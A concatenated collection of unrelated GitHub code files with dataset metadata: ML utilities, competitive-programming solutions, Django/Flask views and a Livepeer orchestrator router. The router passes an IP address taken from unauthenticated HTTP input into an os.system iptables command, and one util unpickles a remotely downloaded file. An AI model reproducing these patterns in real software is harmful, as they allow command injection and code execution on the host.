faster_rcnn_resnet50_v1b_voc\n with open('../static/faster_rcnn_resnet50_v1b_voc.pkl', 'rb') as fp:\n net = pickle.load(fp)\n except Exception:\n import urllib.request\n urllib.request.urlretrieve('https://project-lookmorning.s3.ap-northeast-2.amazonaws.com/faster_rcnn_resnet50_v1b_voc.pkl','faster_rcnn_resnet50_v1b_voc.pkl')\n with open('../static/faster_rcnn_resnet50_v1b_voc.pkl', 'rb') as fp:\n net = pickle.load(fp)\n\n im_fname = utils.download(daily['img_path'])\n x, orig_img = data.transforms.presets.rcnn.load_test(im_fname)\n box_ids, scores, bboxes = net(x)\n\n labels = box_ids[0].asnumpy()\n scores = scores[0].asnumpy()\n for i, bbox in enumerate(bboxes[0]):\n if labels is not None and labels.flat[i] != 14: # box_id 14 is 'person'\n continue\n if scores is not None and scores.flat[i] < 0.7: # Let thresh = 0.7\n continue\n return True\n\n # delete downloaded file\n os.remove(im_fname)\n\n return False","repo_name":"sisobus/WebStudio2019","sub_path":"projects/20130602/api/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"29302010626","text":"S = input()\n\"\"\"\n方針\n1. 確実にif char in s: で確実に文字が含まれているリストを作成\n2. リストO、リストXを作っておく\n3. for ループでi, char でenumarate(S)を回す\n4. もしcharが==\"o\"ならOにappend str(i)\n5. もしcharが==\"x\"ならXにappend str(i)\n\n1.asn = 0としておく\n2. 文字列sの中に含まれていない数字のリストを作成\n3. 10000回ループで文字列.zfill(4)で4桁目まで穴埋め\n4. もしjudge関数(s)でTrue判定が出たなら\n5. ans に+1\n\njudge関数について\n1. リストOのループを回す\n2. s内にOの要素がなければ Falseを返す\n3. Xも同様でs 内にxの要素があればFalseを返す\n\n\"\"\"\n\nT = []\nF = []\n\ndef judge(s):\n for t in T:\n if t not in s:\n return False\n\n for f in F:\n if f in s:\n return False\n return True\n\n\nfor i, char in enumerate(S):\n if char == \"o\":\n T.append(str(i))\n elif char == \"x\":\n F.append(str(i))\n\nans = 0\n\nfor i in range(10000):\n s = str(i).zfill(4)\n if judge(s):\n ans += 1\n\nprint(ans)\n\n\n\n\n\n","repo_name":"motokikando/code_algorithm","sub_path":"ABC/ABC201/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22047438400","text":"from . import card\nimport random\n\nclass Deck:\n\n\n def __init__( self ):\n suits = [ \"spades\" , \"hearts\" , \"clubs\" , \"diamonds\" ]\n self.cards = []\n\n for s in suits:\n for i in range(1,14):\n str_val = \"\"\n point_val = i\n if i == 1:\n str_val = \"Ace\"\n point_val = 13\n elif i == 11:\n str_val = \"Jack\"\n elif i == 12:\n str_val = \"Queen\"\n elif i == 13:\n str_val = \"King\"\n else:\n str_val = str(i)\n self.cards.append( card.Card( s , point_val , str_val ) )\n\n def show_cards(self):\n for card in self.cards:\n card.card_info()\n \n def empty_deck(self):\n self.cards.clear()\n\n def randomize(self):\n new_deck = Deck()\n new_deck.empty_deck()\n while len(self.cards):\n random_number = random.randrange(0,len(self.cards))\n new_deck.cards.append(self.cards[random_number])\n self.cards.pop(random_number)\n self.cards = new_deck.cards\n\n def split_deck(self):\n new_deck = Deck()\n new_deck.empty_deck()\n while len(self.cards) > 26:\n random_number = random.randrange(0,len(self.cards))\n new_deck.cards.append(self.cards[random_number])\n self.cards.pop(random_number)\n return new_deck.cards\n","repo_name":"ChrisSav713/Deck_of_Cards","sub_path":"classes/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38000176741","text":"import pika\nimport json\nimport fire\nfrom loguru import logger\nfrom stock_predict.stock_spider.config import config\n\n\nparameters = (\n pika.ConnectionParameters(host=config[\"RABBITMQ_HOST\"], port=config[\"RABBITMQ_PORT\"],heartbeat=0)\n)\n\nconn = pika.BlockingConnection(parameters)\nchannel = conn.channel()\n\ndef publish_get_hs300_daily():\n payload = {\n 'task':'hs300_daily'\n }\n logger.info(\"publish to queue {} get_hs300_daily\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\"))\n\ndef publish_get_hs300_all():\n payload = {\n 'task':'hs300_all'\n }\n logger.info(\"publish to queue {} get_hs300_all\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\"))\n\ndef publish_daily_update_etf():\n payload = {\n 'policy_stock_pool':config[\"policy_stock_pool\"],\n 'task':'daily_update_etf'\n }\n logger.info(\"publish to queue {} daily_update_etf\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\")) \n\ndef publish_write_stock(code):\n payload = {\n 'code':code,\n 'task':'write_stock'\n }\n logger.info(\"publish to queue {} write_stock\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\")) \n\n\nif __name__ == \"__main__\":\n fire.Fire()\n","repo_name":"Ricardo-wangxing/stock-predict","sub_path":"publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"5178335283","text":"import bs4\n\nfrom typing import List\nimport asyncio\n\n\ndef foo(a: List[str]) -> int:\n return a\n\n\ns = foo([\"12\"])\ns.decode('12')\n\n\nasync def factorial():\n global taskid\n while 1:\n task = await father_child.get()\n # child_father.put(task)\n await asyncio.sleep(2)\n await child_father.put(task)\n\n\ndef genFure():\n future = asyncio.Future()\n future.set_result(100)\n # print(loop.create_task(asyncio.sleep(4)))\n # future.set_result(100)\n return future\n\n\ndef callback(*args):\n print(\"callback {}\".format(str(args)))\n\n\nasync def wrapfuture():\n await asyncio.sleep(2)\n asyncio.ensure_future(main(), loop=loop)\n\n\nasync def main():\n for _ in range(10):\n print(\"father put task {} {}\".format(_, type(_)))\n await father_child.put(_)\n tasks = [\n asyncio.ensure_future(factorial()),\n asyncio.ensure_future(factorial()),\n asyncio.ensure_future(factorial())]\n while 1:\n task = await child_father.get()\n print(\"father know {} finished\".format(task))\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n father_child = asyncio.Queue()\n child_father = asyncio.Queue()\n loop.run_until_complete(main())\n loop.run_forever()\n","repo_name":"connectthefuture/PythonCode","sub_path":"python3/tools/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38681669344","text":"import sys\r\nsys.path.append(\"../Utilities\")\r\n\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport csv\r\n\r\nPATH_FILE_RESULTS_JACCARD_LEVEL = \"../../Risultati/Jaccard_Level/Jaccard_Level_Results.csv\"\r\nPATH_FILE_METRICS = \"../../dataset/Dataset formato CSV/metrics.csv\"\r\nPATH_FILE_RESULTS = \"../../Risultati/Linear_Fit/Linear_Fit_Results.csv\"\r\n\r\nFIELD_LINEAR_FIT = ['original_tweet_id', 'lvl_usr_diff_slope', 'lvl_usr_diff_gof', 'lvl_usr_diff_intercept']\r\n\r\n#Apriamo i risultati ottenuti precedentemente sulle cascate, divisi per livelli\r\npd_results = pd.read_csv(PATH_FILE_RESULTS_JACCARD_LEVEL)\r\n\r\nwith open(PATH_FILE_METRICS, encoding = \"utf8\") as file_metrics, open(PATH_FILE_RESULTS, 'w', newline = '') as file_results:\r\n reader_metrics = csv.DictReader(file_metrics)\r\n writer_results = csv.DictWriter(file_results, fieldnames = FIELD_LINEAR_FIT)\r\n writer_results.writeheader()\r\n \r\n row_counter = 0\r\n \r\n for row in reader_metrics:\r\n \r\n #Recuperiamo la lista delle medie, ordinate a partire dal livello più basso\r\n mean_list = list(pd_results.loc[(pd_results[\"original_tweet_id\"] == int(row[\"original_tweet_id\"])) & (pd_results['num_level'] != 1000)].sort_values(\"num_level\", ascending = True)[\"lvl_usr_diff_mean\"])\r\n \r\n #Non consideriamo le cascate troppo piccole o problematiche\r\n if not mean_list or len(mean_list) < 2:\r\n continue\r\n \r\n #Generiamo un array di numeri consecutivi da 1 al numero dei livelli\r\n x_axis = list(map(lambda x: x + 1, list(range(len(mean_list)))))\r\n \r\n #Effettuiamo il fit lineare\r\n slope, intercept, rvalue, pvalue, stderr = stats.linregress(x_axis, mean_list) \r\n \r\n #Scriviamo i risultati\r\n writer_results.writerow({'original_tweet_id': row['original_tweet_id'], 'lvl_usr_diff_slope': slope, 'lvl_usr_diff_gof': rvalue, 'lvl_usr_diff_intercept': intercept}) \r\n \r\n row_counter += 1","repo_name":"steflyx/A-Study-on-polarization-on-Twitter","sub_path":"Tesi/Script Python/Script di calcolo/LinearFitCalculator.py","file_name":"LinearFitCalculator.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39284961089","text":"from django.urls import path\nfrom . import views\n\napp_name = \"tasklists\"\n\nurlpatterns = [\n # ADD TASK AND RETRIEVE TASK\n path('', views.todo_index, name=\"toDo\"),\n path('delete//', views.delete, name=\"task_delete\"),\n path('status/change//', views.changestatus, name=\"change_status\"),\n path('edit//', views.edittask, name=\"edit_task\"),\n]\n","repo_name":"abdulrahim-uj/postgres_work","sub_path":"tasklists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6726532637","text":"elements = input().split()\nstock = {}\nsearched_products = input().split()\nfor index in range(0, len(elements), 2):\n key = elements[index]\n value = elements[index + 1]\n stock[key] = int(value)\n\nfor product in searched_products:\n if product in stock:\n print(f\"We have {stock[product]} of {product} left\")\n else:\n print(f\"Sorry, we don't have {product}\")\n\n","repo_name":"miglenamag/pythonFundamentals","sub_path":"07.dictionaries/dict-lab/2.stock.py","file_name":"2.stock.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71180986487","text":"import json\r\nfilename = 'username.json'\r\nname = ''\r\n\r\ntry:\r\n with open(filename, 'r') as rrr:\r\n name = json.load(rrr)\r\nexcept IOError:\r\n print('first time login')\r\n\r\nif name != '': \r\n print(\"Welcome back, \" + name + \"!\")\r\nelse: \r\n name = input('Hello, what is your name?')\r\n\r\ntry:\r\n with open(filename, 'w') as f:\r\n name = json.dump(name, f)\r\nexcept IOError:\r\n print('Try again')\r\n","repo_name":"Desmazing/aws_restart","sub_path":"hellojson.py","file_name":"hellojson.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25031415051","text":"from itools.core import merge_dicts\nfrom itools.datatypes import Boolean, Integer, Unicode\nfrom itools.datatypes import String\nfrom itools.gettext import MSG\nfrom itools.web import STLView, STLForm\nfrom itools.xml import XMLParser\n\n# Import from ikaaro\nfrom ikaaro.forms import MultilineWidget\nfrom ikaaro.messages import MSG_CHANGES_SAVED\n\n# Import from shop\nfrom shop.payments.payment_way_views import PaymentWay_Configure\nfrom shop.payments.payment_way_views import PaymentWay_EndView\nfrom shop.utils import format_price\n\n\n\nclass CashPayment_RecordView(STLView):\n\n template = '/ui/backoffice/payments/cash/record_view.xml'\n\n def get_namespace(self, resource, context):\n get_record_value = self.payment_table.get_record_value\n amount = get_record_value(self.record, 'amount')\n return {'is_ok': get_record_value(self.record, 'state'),\n 'amount': format_price(amount),\n 'ref': get_record_value(self.record, 'ref'),\n 'address': self.payment_way.get_property('address')}\n\n\nclass CashPayment_RecordEdit(STLForm):\n\n template = '/ui/backoffice/payments/cash/record_edit.xml'\n\n schema = {'payment_way': String,\n 'id_payment': Integer,\n 'state': Boolean}\n\n\n def get_value(self, resource, context, name, datatype):\n if name == 'payment_way':\n return self.payment_way.name\n elif name == 'id_payment':\n return self.id_payment\n get_record_value = self.payment_table.get_record_value\n return get_record_value(self.record, name)\n\n\n def action_edit_payment(self, resource, context, form):\n kw = {'state': form['state']}\n if kw['state']:\n self.payment_way.set_payment_as_ok(self.id_payment, context)\n self.payment_table.update_record(self.id_payment, **kw)\n context.message = MSG_CHANGES_SAVED\n\n\n\nclass CashPayment_Configure(PaymentWay_Configure):\n\n title = MSG(u'Configure checkpayment module')\n\n schema = merge_dicts(PaymentWay_Configure.schema,\n address=Unicode(mandatory=True))\n\n\n widgets = PaymentWay_Configure.widgets + [\n MultilineWidget('address', title=MSG(u'Address'))]\n\n\n\nclass CashPayment_End(PaymentWay_EndView):\n\n access = \"is_authenticated\"\n\n template = '/ui/backoffice/payments/cash/end.xml'\n\n def get_namespace(self, resource, context):\n address = resource.get_property('address').encode('utf-8')\n return merge_dicts(\n PaymentWay_EndView.get_namespace(self, resource, context),\n address=XMLParser(address.replace('\\n', '
    ')))\n","repo_name":"hforge/shop","sub_path":"payments/cash/cash_views.py","file_name":"cash_views.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"37943379943","text":"from flask import Flask,render_template,request,url_for\r\nimport jsonify\r\nimport requests\r\nimport pickle\r\nimport numpy as np\r\nimport sklearn\r\n\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('file.pkl','rb'))\r\n\r\n@app.route('/',methods=['GET'])\r\ndef Home(): \r\n return render_template('index.html') \r\n\r\nstandard_to = StandardScaler()\r\n\r\n@app.route('/predict',methods = ['POST'])\r\ndef predict():\r\n Fuel_Type_Diesel =0\r\n if request.method == 'POST':\r\n year = int(request.form['year'])\r\n new_price = float(request.form['new_price'])\r\n kmdriven = int(request.form['kmdriven'])\r\n fueltype = request.form['fuel']\r\n transmissiontype = request.form['transmissiontype']\r\n enginecc=int(request.form['enginecc'])\r\n mileage=float(request.form['mileage'])\r\n if(fueltype == 'Petrol'):\r\n fuel = 0\r\n if(fueltype == 'Diesel'):\r\n fuel = 1\r\n else:\r\n fuel = 2\r\n\r\n if(transmissiontype == 'Manual'):\r\n transmissiontype = 0\r\n else:\r\n transmissiontype = 1\r\n\r\n prediction = model.predict([[new_price,year,fuel,transmissiontype,mileage,enginecc,kmdriven]])\r\n output = round(prediction[0],2)\r\n \r\n if output<0:\r\n return render_template('index.html',prediction_text='Sorry! You cannot sell this car')\r\n else:\r\n return render_template('index.html', prediction_text='You can sell this car at Rs.{} lakhs'.format(output))\r\n \r\n else:\r\n return render_template('index.html')\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"jayantsinghjhala/Projects","sub_path":"Used Car Price Evaluator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27395825518","text":"from django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.shortcuts import redirect,render\n# template\nfrom django.template import Template,Context,loader\n# auth\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\n# gestor\nfrom gestor.models import *\nfrom gestor.forms import UserRegisterForm\n# python \nimport datetime\nimport pdb # pdb.set_trace()\n\n# django User model and auth class\n\ndef usuarioAdd(req):\n diccionario = {\n 'fecha':datetime.datetime.now(),\n 'model':'usuarios',\n # 'theme':'Quartz',\n # 'theme':'Sketchy',\n } \n if req.method == 'POST':\n form=UserRegisterForm(req.POST)\n if form.is_valid(): \n username=form.cleaned_data['username']\n form.save()\n messages.success(req,f'El usuario {username} fue creado con exito ')\n else:\n messages.success(req,f'Probando los mensajes')\n form=UserRegisterForm()\n # diccionario['usuarios']= User.objects.all()\n diccionario['formulario']= form\n return render(req,'Usuario.html',diccionario)\n\ndef usuarioLogin(req): \n diccionario = {\n 'fecha':datetime.datetime.now(),\n # 'model':'usuarios',\n # 'theme':'Quartz',\n # 'theme':'Sketchy',\n }\n if req.method == 'POST':\n form=AuthenticationForm(req,req.POST)\n if form.is_valid():\n username=form.cleaned_data['username']\n password=form.cleaned_data['password']\n user = authenticate(username=username,password=password)\n if user is not None:\n login(req,user)\n messages.success(req,f'Hola {username} bienvenido')\n return redirect('home')\n else:\n messages.error(req, f'Usuario o contraseña incorrectas')\n else:\n messages.error(req, f'Usuario o contraseña incorrectas')\n else:\n form=AuthenticationForm()\n # diccionario['usuarios']= User.objects.all()\n diccionario['formulario']= form\n return render(req,'Login.html',diccionario)\n\ndef usuarioLogout(req):\n logout(req)\n return redirect('login')\n\n# Learn django\n\ndef calculo(req,fechaNacimiento,fechaFutura): \n añoActual = datetime.datetime.now().year\n edadActual = añoActual-fechaNacimiento\n edadFutura = fechaFutura-fechaNacimiento\n diccionario={\n 'fechaNacimiento':fechaNacimiento,\n 'edadActual':edadActual,\n 'edadFutura':edadFutura,\n 'fechaFutura':fechaFutura,\n\n }\n doc_externor=loader.get_template('calculo.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef saludar(req):\n diccionario = {\"titulo\":'Pagina de bienvenida',}\n doc_externor=loader.get_template('layout/layout.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef tareas(req):\n taskList = ['Migrar templates desde Flask','reciclar Header y fotter en templates']\n diccionario={\n 'titulo':'Lista de tareas',\n 'nameList':'Tareas Django',\n 'taskList':taskList\n }\n doc_externor=loader.get_template('tareas.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef fecha(req):\n fecha = datetime.datetime.now()\n diccionario = {\n 'titulo':'Pagina de fecha',\n 'fecha':fecha\n }\n doc_externor=loader.get_template('intro.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef videos(req):\n fecha = datetime.datetime.now()\n diccionario = {\n 'titulo':'Pagina de videos',\n 'fecha':fecha\n }\n doc_externor=loader.get_template('videos.html')\n documento=doc_externor.render(diccionario) \n return HttpResponse(documento)\n\n\n # art = articulo.objects.filter(seccion='tecnologia')\n # art = articulo.objects.filter(precio__gt=90) ","repo_name":"Juanklg/G29-MinTic","sub_path":"proydjango/proydjango/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70279882805","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nfrom collections import deque\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n if root is None:\n return 0\n depth = 0\n q = deque()\n q.append(root)\n while len(q) != 0:\n depth += 1\n size = len(q)\n for _ in range(size):\n node = q.popleft()\n if node.left is None and node.right is None:\n return depth\n if node.left is not None:\n q.append(node.left)\n if node.right is not None:\n q.append(node.right)\n return depth\n","repo_name":"erenming/leetcode-py3","sub_path":"bfs/minDepth.py","file_name":"minDepth.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33458687329","text":"from .db import db\nfrom datetime import datetime\n\n\nclass Repair(db.Model):\n __tablename__ = 'repairs'\n\n id = db.Column(db.Integer, primary_key=True)\n pool_id = db.Column(\n db.Integer, db.ForeignKey(\"pools.id\"), nullable=False)\n title = db.Column(db.String(100), nullable=False)\n description = db.Column(db.Text)\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n\n pool = db.relationship(\n \"Pool\", back_populates=\"repairs\")\n tasks = db.relationship(\n \"Task\", back_populates=\"repair\", order_by=\"Task.updated_at.desc()\", cascade=\"delete, delete-orphan\")\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n\n def to_dict_tasks(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"tasks\": [task.to_dict() for task in self.tasks],\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n\n def to_dict_full(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"tasks\": [task.to_dict() for task in self.tasks],\n \"pool\": self.pool.to_dict_client(),\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n","repo_name":"memg92/poolsight","sub_path":"app/models/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"14945660718","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport numpy as np\nimport cv2\nfrom mtcnn import MTCNN\nimport matplotlib.pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\n#Import image here\n\nimage = cv2.imread(\"human.jpg\")\nimage = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nplt.imshow(image)\n\n\n# %%\n# Add object to show in filter ,ex:sunglasses\nglasses = cv2.imread(\"sunglasses_blue.png\",-1)\nglasses = cv2.cvtColor(glasses,cv2.COLOR_BGR2RGBA)\nplt.imshow(glasses)\n\n\n# %%\nmtcnn = MTCNN()\nfaces = mtcnn.detect_faces(image)\nfaces\n\n\n# %%\n#Use in case of multiple faces\nface = faces[0]\nface\n\n\n# %%\nx, y, w, h =face['box']\n\ntemp_image = np.copy(image)\n\ntemp_image = cv2.rectangle(temp_image,(x,y),(x+w,y+h),(0,0,255),2)\n\nplt.imshow(temp_image)\n\n\n# %%\nimg_filter = np.copy(glasses)\nbg_image = np.copy(image)\n\n\n(x1,y1),(x2,y2) = (face['keypoints']['left_eye']),(face['keypoints']['right_eye'])\n\nx1 -= 35\ny1 -= 30\nx2 += 35\ny2 += 30\n\nw = x2 - x1\nh = y2 - y1\n\nimg_filter = cv2.resize(img_filter,(w,h))\n\nalpha_filter = img_filter[:,:,3]/255.0\nalpha_bg = 1.0 -alpha_filter\n\nfor c in range(0,3):\n bg_image[y1:y2,x1:x2,c] = (alpha_filter * img_filter[:,:,c]+ \n alpha_bg * bg_image[y1:y2,x1:x2,c])\n \nplt.imsave(\"final_image.jpg\",bg_image)\nplt.imshow(bg_image)\n\n\n# %%\nsnapchat_filter = np.hstack((image,bg_image))\n\nplt.imsave(\"snapchat_filter.jpg\",snapchat_filter)\nplt.imshow(snapchat_filter)\n\n\n# %%\ncv2.destroyAllWindows()\n\n\n# %%\n\n\n\n","repo_name":"Abh300/Snapchat_filter","sub_path":"Python_code.py","file_name":"Python_code.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11158813291","text":"\"\"\"\nContains code for the base kernel object used when making kernels for\ngaussian process modeling.\n\"\"\"\n\nimport numpy as np\nfrom squidward.utils import array_equal, exactly_2d\n\nnp.seterr(over=\"raise\")\n\nclass Kernel(object):\n \"\"\"Base class for Kernel object.\"\"\"\n\n def __init__(self, distance_function=None, method='k1'):\n \"\"\"\n Description\n ----------\n This class is the base class for a kernel object. It basically takes the\n input distance function and finds the the distance between all vectors in\n two lists and returns that matrix as a covariance matrix.\n\n Parameters\n ----------\n distance_function : Function\n A function that takes in two vectors and returns a float\n representing the distance between them.\n method: String\n The method used for iterating over the input vectors to arrive\n at the covariance matrix.\n\n Returns\n ----------\n Model object\n \"\"\"\n self.distance_function = distance_function\n\n assert self.distance_function is not None, \\\n \"Model object must be instantiated with a valid distance function.\"\n\n assert not isinstance(self.distance_function, (str, int, float, list, np.ndarray)), \\\n \"Model object must be instantiated with a valid distance function.\"\n\n if method == 'k1':\n self._k = self._k1\n elif method == 'k2':\n self._k = self._k2\n else:\n raise Exception(\"Invalid argument for kernel method.\")\n\n def __call__(self, alpha, beta):\n \"\"\"\n Parameters\n ----------\n alpha: array-like\n The first array to compare. Must either be a 1 or 2D array.\n beta: array-like\n The second array to compare. Must match dimensions for alpha.\n \"\"\"\n alpha, beta = exactly_2d(alpha), exactly_2d(beta)\n return self._k(alpha, beta)\n\n def _k1(self, alpha, beta):\n \"\"\"\n Implementation inspired by scipy.spacial.distance cdist v1.2.0\n For loop through every index i,j for input vectors alpha_i and beta_j\n \"\"\"\n # lengths of each vector to compare\n n_len, m_len = alpha.shape[0], beta.shape[0]\n # create an empty array to fill with element wise vector distances\n cov = np.full((n_len, m_len), 0.0)\n # loop through each vector\n for i in range(n_len):\n for j in range(m_len):\n # assign distances to each element in covariance matrix\n cov[i, j] = self.distance_function(alpha[i, :], beta[j, :])\n return cov\n\n def _k2(self, alpha, beta):\n \"\"\"\n Implementation that exploits covariance symmetry when possible. Good\n for fitting and testing on larger datasets.\n \"\"\"\n # lengths of each vector to compare\n n_len, m_len = alpha.shape[0], beta.shape[0]\n # if comparing an array against itself exploit symmetry\n if array_equal(alpha, beta):\n # create an empty array to fill with element wise vector distances\n cov = np.full((n_len, m_len), 0.0)\n # loop through each vector\n for i in range(n_len):\n for j in range(i, m_len):\n # assign distances to each element in covariance matrix\n cov[i, j] = cov[j, i] = self.distance_function(alpha[i, :], beta[j, :])\n return cov\n return self._k1(alpha, beta)\n","repo_name":"James-Montgomery/squidward","sub_path":"squidward/kernels/kernel_base.py","file_name":"kernel_base.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25353529032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 26 12:00:29 2021\n\n@author: jkuhnsman\n\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom io import BytesIO\nimport json\nimport ast\nfrom threading import Thread\nimport time\nimport requests\nimport imp\nimport os\nimport iptc\n\nimport Orchestrator\n\nimp.reload(Orchestrator)\n\nglobal body\nglobal KEEP_RUNNING\nKEEP_RUNNING = True\n\nclass Router():\n def __init__(self, _orchPool):\n self.orchPool = _orchPool\n self.current_orch = None\n \n def orchPoolHasPhysicalOrchs(self):\n if len(self.orchPool.physicalOrchestrators) > 0:\n return True\n else:\n return False\n \n def set_current_orch(self, orch):\n if self.current_orch == orch:\n print('already using the best orchestrator')\n else:\n self.current_orch = orch\n self.iptable_flush()\n self.iptable_add(orch)\n \n def iptable_flush(self):\n iptc.Table('nat').chains[0].flush()\n \n def iptable_add(self,orch):\n add_orch = 'iptables -t nat -A PREROUTING -i enp1s0 -p tcp --dport 8935 -j DNAT --to {}'\n os.system(add_orch.format(orch.ipAddr))\n \n \n \nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n global orchPool \n global server\n \n def do_GET(self):\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b'Hello, world!')\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n data = self.rfile.read(content_length)\n data_decoded = data.decode('utf-8')\n body = ast.literal_eval(data_decoded)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'This is POST request. ')\n response.write(b'Received: ')\n response.write(data)\n self.wfile.write(response.getvalue())\n #print(repr(body))\n orchPool.process_request(body)\n \ndef http_server():\n #global server\n global KEEP_RUNNING\n \n httpd = HTTPServer(('', 6000), SimpleHTTPRequestHandler)\n while True:\n httpd.handle_request()\n \n time.sleep(1)\n print('http server is done')\n \ndef main():\n global router\n print('clear iptables')\n while True:\n availableOrchs = router.orchPool.get_available_orchs()\n \n if len(availableOrchs) > 0:\n router.set_current_orch(availableOrchs[0])\n else:\n print('no orchestrators available')\n \n time.sleep(3)\n#%%\nglobal orchPool\norchPool = Orchestrator.OrchestratorPool()\n\nglobal router\nrouter = Router(orchPool)\n#%%\n\njs1 = {'command':'register_orchestrator',\n 'type':'physical',\n 'ipAddr':'1.2.3.4',\n 'maxSessions':10,\n 'isDefault':'yes'}\n\njs2 = {'command':'register_orchestrator',\n 'type':'virtual',\n 'ipAddr':'2.6.7.8',\n 'maxSessions':10,\n 't_id':'i-014c83a7f386f9e6b'}\n\njs3 = {'command':'register_orchestrator',\n 'type':'physical',\n 'ipAddr':'3.2.3.4',\n 'maxSessions':10,\n 'isDefault':'no'}\n\nmet = {'command':'update_metrics',\n 'ipAddr':'1.2.3.4',\n 'metrics':{'maxSessions':10, 'currentSessions':8}\n }\n\norchPool.register_orchestrator(js1)\norchPool.register_orchestrator(js2)\norchPool.register_orchestrator(js3)\norchPool.update_metrics(met)\n\n\n#%%\nif __name__ == \"__main__\": \n \n KEEP_RUNNING = True\n server_thread = Thread(target=http_server)\n server_thread.daemon = True\n server_thread.start()\n \n #server_thread.join()\n \n main_thread = Thread(target=main)\n main_thread.start()\n\n\n \n \n \n \n \n \n ","repo_name":"musicmank545/livepeer","sub_path":"router_v3.py","file_name":"router_v3.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22703462012","text":"\"\"\"\nWrite a Python program that, given three times of completion tS, tC and tR (in hours; one for each stage) by user input, in this order, checks if the participant met all the requirements. If so, it should print the total time. Otherwise, it should print the first factor that caused the 